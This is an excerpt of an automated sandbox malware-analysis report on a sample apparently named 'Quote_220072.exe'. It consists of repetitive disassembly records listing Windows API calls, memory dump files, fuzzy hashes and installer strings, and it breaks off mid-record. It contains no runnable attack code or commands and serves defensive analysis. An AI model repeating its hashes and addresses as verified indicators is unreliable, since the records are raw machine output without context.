                                                                              • Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID:
                                                                              • API String ID: 3850602802-0
                                                                              • Opcode ID: b2e0c2379e296d93849bb49f42c53d0230087db54a3c83b1da74e836768489aa
                                                                              • Instruction ID: ded955796c7b3a29419b03b8f07dbed72bf973f4b2991851ad7e5473cbc7331c
                                                                              • Opcode Fuzzy Hash: b2e0c2379e296d93849bb49f42c53d0230087db54a3c83b1da74e836768489aa
                                                                              • Instruction Fuzzy Hash: C3C04C716446007ADA109B619E05F077759A791701F10C8297240E55E0C675E460CA2C
                                                                              APIs
                                                                              • SendMessageW.USER32(00000028,?,00000001,00405316), ref: 004054EF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID:
                                                                              • API String ID: 3850602802-0
                                                                              • Opcode ID: 1714e4f5a6add7520e2ba1d59cc8065429a1d3178019bc2ad80d0ec1eb9059a5
                                                                              • Instruction ID: 87925707e6409367d6b01bd6df3e013852da7cf14c64ffa79ed0cacb9bd9d926
                                                                              • Opcode Fuzzy Hash: 1714e4f5a6add7520e2ba1d59cc8065429a1d3178019bc2ad80d0ec1eb9059a5
                                                                              • Instruction Fuzzy Hash: 28B09239684600AADA195B00EE09F467B62ABA4701F008428B240640B0CAB210A0DB18
                                                                              APIs
                                                                              • SetFilePointer.KERNELBASE(?,00000000,00000000,004035B5,?), ref: 0040313F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: FilePointer
                                                                              • String ID:
                                                                              • API String ID: 973152223-0
                                                                              • Opcode ID: eeb6e3b4f510f7bce7f4acd2004317b94e1f980229c798523801c224a6f07df3
                                                                              • Instruction ID: 249934cc5d2069a5a678a88893d20fb7c04287045258dfdbdab4020963f10c22
                                                                              • Opcode Fuzzy Hash: eeb6e3b4f510f7bce7f4acd2004317b94e1f980229c798523801c224a6f07df3
                                                                              • Instruction Fuzzy Hash: 94B09231140200AADA214F009E0AF057B21AB90700F108434B290680F086711060EA0D
                                                                              APIs
                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,?,00000000,?,0040623C,?,?), ref: 0040631F
                                                                              • GetShortPathNameW.KERNEL32(?,007A5688,00000400), ref: 00406328
                                                                              • GetShortPathNameW.KERNEL32(?,007A4E88,00000400), ref: 00406345
                                                                              • wsprintfA.USER32 ref: 00406363
                                                                              • GetFileSize.KERNEL32(00000000,00000000,007A4E88,C0000000,00000004,007A4E88,?), ref: 0040639B
                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 004063AB
                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 004063DB
                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,007A4A88,00000000,-0000000A,00408984,00000000,[Rename],00000000,00000000,00000000), ref: 004063FB
                                                                              • GlobalFree.KERNEL32(00000000), ref: 0040640D
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00406414
                                                                                • Part of subcall function 004068F9: GetFileAttributesW.KERNELBASE(?,0040340D,C:\Users\user\Desktop\Quote_220072.exe,80000000,00000003), ref: 004068FD
                                                                                • Part of subcall function 004068F9: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000), ref: 0040691D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: File$CloseGlobalHandleNamePathShort$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                              • String ID: %ls=%ls$[Rename]
                                                                              • API String ID: 2900126502-461813615
                                                                              • Opcode ID: a2b202ff8827565348ba147a21b9a484a8522b83e041da5fa409378b6696546f
                                                                              • Instruction ID: 9f7f24d6a9d8affb6c81019e1e78af230b3462d5c5472edf7d8bbe76e1c752c2
                                                                              • Opcode Fuzzy Hash: a2b202ff8827565348ba147a21b9a484a8522b83e041da5fa409378b6696546f
                                                                              • Instruction Fuzzy Hash: 1B3128B16012117BD7206B358D49F7B3A5CEF81749B06453EF943FA2C2DA7D88628A7C
                                                                              APIs
                                                                                • Part of subcall function 6FF812F8: GlobalAlloc.KERNEL32(00000040,?,6FF811C4,-000000A0), ref: 6FF81302
                                                                              • GlobalFree.KERNEL32(00000000), ref: 6FF822F1
                                                                              • GlobalFree.KERNEL32(00000000), ref: 6FF82326
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1656920122.000000006FF81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1656896875.000000006FF80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1656977561.000000006FF84000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1656996339.000000006FF86000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6ff80000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: Global$Free$Alloc
                                                                              • String ID: s<u
                                                                              • API String ID: 1780285237-779365171
                                                                              • Opcode ID: 33ed04a87e88edc3926e382e2b2097f827a8f4e74042a4088e5861bbec1b8f0c
                                                                              • Instruction ID: 63cc8096b8e2e04cd55d6496d8c0e8f0a395b888bd882e68a68dd1d82578f38f
                                                                              • Opcode Fuzzy Hash: 33ed04a87e88edc3926e382e2b2097f827a8f4e74042a4088e5861bbec1b8f0c
                                                                              • Instruction Fuzzy Hash: F531E232114601EBEB258F68C958FBBB7B8FF47325B000269F431D62A0DB72A460DB61
                                                                              APIs
                                                                              • CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406D90
                                                                              • CharNextW.USER32(?,?,?,00000000), ref: 00406D9F
                                                                              • CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406DA4
                                                                              • CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406DBC
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00406D1B, 00406D1D
                                                                              • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406D22
                                                                              • *?|<>/":, xrefs: 00406D7F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: Char$Next$Prev
                                                                              • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
                                                                              • API String ID: 589700163-776222514
                                                                              • Opcode ID: 5b032911993fa6072ca7f20f73d4f3d6e0cff76cb04f630808d27ad5f640f473
                                                                              • Instruction ID: 64caea1e5fba35c947d9094266ac5fc002638ab42ea644ca00d5fa91912821bd
                                                                              • Opcode Fuzzy Hash: 5b032911993fa6072ca7f20f73d4f3d6e0cff76cb04f630808d27ad5f640f473
                                                                              • Instruction Fuzzy Hash: 7511D511B0063156DB30672A8C4097772E8DF69761756443BFDC6E32C0F77D8D9192B9
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                              • String ID:
                                                                              • API String ID: 2320649405-0
                                                                              • Opcode ID: bf0799ea3bd6f053e04a74c3ecacf9df28762d59f89d86d460fcd2570ffda868
                                                                              • Instruction ID: 26ea8d1a65f0c358df8059d13c2b59527feb86654ff2728a298fdc5f00fd0ae6
                                                                              • Opcode Fuzzy Hash: bf0799ea3bd6f053e04a74c3ecacf9df28762d59f89d86d460fcd2570ffda868
                                                                              • Instruction Fuzzy Hash: E221D675500B049FDB649F28DA4895BB7F4EF45711B108A3EE896A26A0DB38E814DF28
                                                                              APIs
                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040364B
                                                                              • MulDiv.KERNEL32(00124660,00000064,00124660), ref: 00403673
                                                                              • wsprintfW.USER32 ref: 00403683
                                                                              • SetWindowTextW.USER32(?,?), ref: 00403693
                                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 004036A5
                                                                              Strings
                                                                              • verifying installer: %d%%, xrefs: 0040367D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                              • String ID: verifying installer: %d%%
                                                                              • API String ID: 1451636040-82062127
                                                                              • Opcode ID: 047d2cc0e248829387beeb5a8e07bbe74402e6ee51346e78a70c3337b09d8a04
                                                                              • Instruction ID: 44471e5cb11ab05bb0c6ce4c76b363bdac3f6882ce80e8a3b6daee8e8afc751d
                                                                              • Opcode Fuzzy Hash: 047d2cc0e248829387beeb5a8e07bbe74402e6ee51346e78a70c3337b09d8a04
                                                                              • Instruction Fuzzy Hash: BE018F71540208BBDF20AF60DE45BAA3B28A700305F00803AF642B51E0DBB58554CF4C
                                                                              APIs
                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 6FF8116B
                                                                              • GlobalFree.KERNEL32(00000000), ref: 6FF811AE
                                                                              • GlobalFree.KERNEL32(00000000), ref: 6FF811CD
                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 6FF811E6
                                                                              • GlobalFree.KERNEL32 ref: 6FF8125C
                                                                              • GlobalFree.KERNEL32(?), ref: 6FF812A7
                                                                              • GlobalFree.KERNEL32(00000000), ref: 6FF812BF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1656920122.000000006FF81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1656896875.000000006FF80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1656977561.000000006FF84000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1656996339.000000006FF86000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6ff80000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: Global$Free$Alloc
                                                                              • String ID:
                                                                              • API String ID: 1780285237-0
                                                                              • Opcode ID: fb52a0bcc8f741cbb293caee350dd3bf4319181d360246f52919b03f162664c3
                                                                              • Instruction ID: a9c55cd3b43aab519c6e23a22b833c370c45884679d2246364a95b347d9fbef8
                                                                              • Opcode Fuzzy Hash: fb52a0bcc8f741cbb293caee350dd3bf4319181d360246f52919b03f162664c3
                                                                              • Instruction Fuzzy Hash: 3351B0725107029FCB10CF68D840AAA77B8FF4A324B14062AF975DB360E735E910CB91
                                                                              APIs
                                                                              • wsprintfW.USER32 ref: 6FF81F51
                                                                              • lstrcpyW.KERNEL32(?,error,00001018,6FF81765,00000000,?), ref: 6FF81F71
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1656920122.000000006FF81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1656896875.000000006FF80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1656977561.000000006FF84000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1656996339.000000006FF86000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6ff80000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: lstrcpywsprintf
                                                                              • String ID: callback%d$error$s<u
                                                                              • API String ID: 2408954437-3671815815
                                                                              • Opcode ID: c059773d778b48cece091045804e1fb52ce321e581aad8d73e748ff3d5c7c0f7
                                                                              • Instruction ID: f4cac8586b14cb935a76d3bfc18b0729edd23c7970dc066855d7a720b102e69b
                                                                              • Opcode Fuzzy Hash: c059773d778b48cece091045804e1fb52ce321e581aad8d73e748ff3d5c7c0f7
                                                                              • Instruction Fuzzy Hash: 96F01C35204110AFD7088B18D948EBB73B9FF8A314F0586A8F9799B311C774AC549B91
                                                                              APIs
                                                                              • GlobalFree.KERNEL32(00000000), ref: 6FF821BF
                                                                                • Part of subcall function 6FF812E1: lstrcpynW.KERNEL32(00000000,?,6FF8156A,?,6FF811C4,-000000A0), ref: 6FF812F1
                                                                              • GlobalAlloc.KERNEL32(00000040), ref: 6FF8212C
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6FF8214C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1656920122.000000006FF81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1656896875.000000006FF80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1656977561.000000006FF84000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1656996339.000000006FF86000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6ff80000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                              • String ID:
                                                                              • API String ID: 4216380887-0
                                                                              • Opcode ID: a543c6db672500f2ffef8a25024632632ba1a48dd3a759fd1a583475b26fb321
                                                                              • Instruction ID: 3bd90ac4521c95a5520b4500b78554f18e6933d52fa9941e42d3f68046f79865
                                                                              • Opcode Fuzzy Hash: a543c6db672500f2ffef8a25024632632ba1a48dd3a759fd1a583475b26fb321
                                                                              • Instruction Fuzzy Hash: A541F372405B05EFC7009F68C944BEA7BB8FF06354B94033EE979DA289D7727590CAA0
                                                                              APIs
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000808,00000000,6FF82B4C,00000000,00000808), ref: 6FF81F8C
                                                                              • GlobalAlloc.KERNEL32(00000040,00000000), ref: 6FF81F97
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6FF81FAB
                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 6FF81FB6
                                                                              • GlobalFree.KERNEL32(00000000), ref: 6FF81FBF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1656920122.000000006FF81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1656896875.000000006FF80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1656977561.000000006FF84000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1656996339.000000006FF86000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6ff80000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                              • String ID:
                                                                              • API String ID: 1148316912-0
                                                                              • Opcode ID: 37d728c2fcc598573163d6719fe4619a0c8d27e85d43941967de5820ee62663c
                                                                              • Instruction ID: 1426c93540283eff0f520808fc03329eb2d6bb3224e15093e3a8d5941e0f5cc6
                                                                              • Opcode Fuzzy Hash: 37d728c2fcc598573163d6719fe4619a0c8d27e85d43941967de5820ee62663c
                                                                              • Instruction Fuzzy Hash: D5F0C032118528BBCA101AE7DC0CE67BEBCFB8B6FAB160215F629D13B0D56268109771
                                                                              APIs
                                                                              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403CA1,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 0040653A
                                                                              • CharPrevW.USER32(?,00000000), ref: 00406545
                                                                              • lstrcatW.KERNEL32(?,004082B0), ref: 00406557
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00406534
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
